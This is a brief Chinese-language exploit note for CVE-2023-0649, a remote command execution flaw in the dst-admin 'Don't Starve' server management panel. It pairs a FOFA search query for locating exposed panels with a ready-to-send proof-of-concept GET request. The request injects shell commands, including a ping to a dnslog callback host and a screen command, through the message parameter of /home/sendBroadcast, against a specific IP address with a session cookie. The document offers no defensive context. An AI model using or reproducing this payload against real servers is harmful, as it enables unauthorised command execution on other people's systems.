dst-admin饥荒管理后台sendBroadcast文件message参数远程命令执行漏洞（CVE-2023-0649）

fofa

title=="饥荒管理后台"

poc

GET /home/sendBroadcast?message=%5C%22)%5Cn%22%26ping+dnslog%26screen%20-S%20%22DST_CAVES%22%20-p%200%20-X%20stuff%20%22TheNet%3AKick(%5C%22 HTTP/1.1Host: 101.34.250.180:8888User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Cookie: JSESSIONID=5f9d64b1-ef44-40d1-8266-3ebea0d51e89;rememberMe=deleteMe;Accept-Encoding: gzip